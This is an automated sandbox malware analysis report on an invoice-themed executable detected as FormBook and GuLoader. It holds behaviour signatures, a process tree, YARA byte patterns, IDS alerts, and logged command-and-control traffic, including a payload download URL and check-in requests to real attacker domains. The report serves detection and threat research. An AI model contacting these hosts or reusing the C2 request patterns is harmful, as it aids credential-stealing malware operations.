Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB_Invoice.exe

Overview

General Information

Sample Name:AWB_Invoice.exe
Analysis ID:843118
MD5:7af40e9fbf9f324ea0a2db18268e592c
SHA1:49fa548e22d4206e7e6faeac24a78bd1a1e257f4
SHA256:caf7ce820152ced9c7e32dcb331899c2dd5ab092c7207f5994a4ef866d247197
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • AWB_Invoice.exe (PID: 6108 cmdline: C:\Users\user\Desktop\AWB_Invoice.exe MD5: 7AF40E9FBF9F324EA0A2DB18268E592C)
    • AWB_Invoice.exe (PID: 4984 cmdline: C:\Users\user\Desktop\AWB_Invoice.exe MD5: 7AF40E9FBF9F324EA0A2DB18268E592C)
      • RAVCpl64.exe (PID: 7740 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • control.exe (PID: 8968 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)
          • explorer.exe (PID: 4844 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • firefox.exe (PID: 4436 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de57:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de57:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 12 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.2054.159.4.22649877802031449 04/07/23-15:05:57.890423
      SID:2031449
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20122.201.127.149864802031453 04/07/23-15:03:54.747862
      SID:2031453
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20124.71.228.14549852802018752 04/07/23-15:02:49.669494
      SID:2018752
      Source Port:49852
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20122.201.127.149864802031412 04/07/23-15:03:54.747862
      SID:2031412
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.209.9.9.955379532023883 04/07/23-15:03:29.412332
      SID:2023883
      Source Port:55379
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.20122.201.127.149920802031412 04/07/23-15:09:14.069002
      SID:2031412
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20122.201.127.149864802031449 04/07/23-15:03:54.747862
      SID:2031449
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20122.201.127.149920802031453 04/07/23-15:09:14.069002
      SID:2031453
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2054.159.4.22649877802031412 04/07/23-15:05:57.890423
      SID:2031412
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20122.201.127.149920802031449 04/07/23-15:09:14.069002
      SID:2031449
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2054.159.4.22649877802031453 04/07/23-15:05:57.890423
      SID:2031453
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: AWB_Invoice.exeReversingLabs: Detection: 35%
      Source: AWB_Invoice.exeVirustotal: Detection: 54%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://124.71.228.145/sCgFrPXHcEhHCJiO9.binAvira URL Cloud: Label: malware
      Source: 7.2.explorer.exe.13513814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 6.2.control.exe.4f33814.3.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 7.0.explorer.exe.13513814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 8.2.firefox.exe.31753814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: AWB_Invoice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: AWB_Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: control.pdb source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: AWB_Invoice.exe, AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: control.pdbUGP source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: firefox.pdb source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 135.148.10.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 160.124.11.52 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.159.4.226 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.205.156.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.196.84.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.201.13.30 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.131.66 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.117.10.219 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 122.201.127.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 138.68.155.47 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.97.186.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.76.156.252 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49852 -> 124.71.228.145:80
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:55379 -> 9.9.9.9:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: Joe Sandbox ViewASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXsbgwTP46Di1eAkkh+vPQ+IE4AQZ9uoFzyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.agtuscany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=4R3N6uY2KEaFJv5My9X8USGNZqE5wTPbDqipWzMgLmbHXZCAQIUi45Gsr8vYyUhHcb6uJyCcXvi46UGuSQ6cKyZ2u3mWFt6EcQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.vinayakatlantis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=dPIut5mky1KNN3zaAHvK5uzPpNof944ctFAdSBvRpheGYi9HzhIM19d/tYr/fqq+9dholrExeaustykUUMhVEhiWpy+fLWahmQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.devplus.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=1M9SucmICtfCpW/tj24KyOiJ9IaacI1Z4pVA4dfz0JvHGrrKl77RqP3d2y7Nz1UNpIRISpOlczqUmSnOlFPJZEMF2BWLarf/yw==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.15076sediamonddr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=kRRBQ/bHU/W9UkuDtIhtwygoT2D+sgwDIfKWxYHlJR9zKl6zf2tjZKfdztRQYhwD69iGxc9L7QzSu5Kh6I4m2IOVDd3pVDElHQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sberbankfinances.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=2lL86prNXw+vmyyBzvm6Umh532P/K5AtFx4XNAkjw5tRL10GW/bxxzkkZfLlzJDK7KhB1Fc3yjj6fN2xbdgxOm3+/L1UljmTkA==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.dg-computing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=tPdpg+5j5cq3G3NVrgN8qQtsNpTBX2RMNYYlH1Eb7GYZdMqdW/YxFnUShSiyKlH/vw8sFvVppHtL7VWmaInAWO//m3NzV9m1tQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.hangthanhlyonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=gHZL0JWG3wOj6ztmiiV4muoJdl40XHoCcWAONxG5u+5VwItf4ehZOc49QUmaHwAsTMDBmpaDBmzBHnJhASex2uEa6qd8Ly5Wpg==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.minevisn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=bwpeorSwTgARiOW1MBWRQEyO68F/6l/AZk25pS7qV2XiEzJGCZ7h2pTHq/m4oGuSc87Dx3lteJyHEz4BDWZ/BK+hpjxc5sLkyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.aizhudai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=G2Pxnd335B1F0olFxFH9O2gOs4NA5qrQX1XeOZ+b9Vp4PayRZGChFWxI24R0kVFVx5D5YdtTUzFI+4LopIyzGr/eWdxAOOacEQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.ditchest.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=mD2cofacDINv4VIZu4+thbzlb3X2NPYZmRb9xa7ZzsWw/EQ9wRHnn15uVUQBxnXqiY2i38vokGI7Ta2M6WU2C3lENXSOdU9IMQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.explainqrs.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=caybp/dMTc0WqC/7+5uISxKPk9DN3L4WvDWlcQ7l9xc33fFN4b4HHJNIJYe3LSUbMMu5GOPZ7e8ecQ82F95v7G1g+2VWlWzviQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.martabover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXsbgwTP46Di1eAkkh+vPQ+IE4AQZ9uoFzyQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.agtuscany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=SCgv9JMQILisbFXy0J496+0pVHmmIO+Ly3gehI9e6TsxoflXN3ldA6wZUkbmg/DjVxLMEiQQPVlU0RkFofCEWjsodLAn22oqlQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.sbreyuyufwkg.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=4R3N6uY2KEaFJv5My9X8USGNZqE5wTPbDqipWzMgLmbHXZCAQIUi45Gsr8vYyUhHcb6uJyCcXvi46UGuSQ6cKyZ2u3mWFt6EcQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.vinayakatlantis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hhgu/?YG8FU6=dPIut5mky1KNN3zaAHvK5uzPpNof944ctFAdSBvRpheGYi9HzhIM19d/tYr/fqq+9dholrExeaustykUUMhVEhiWpy+fLWahmQ==&kl8YNH=7rv39XcJC HTTP/1.1Host: www.devplus.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 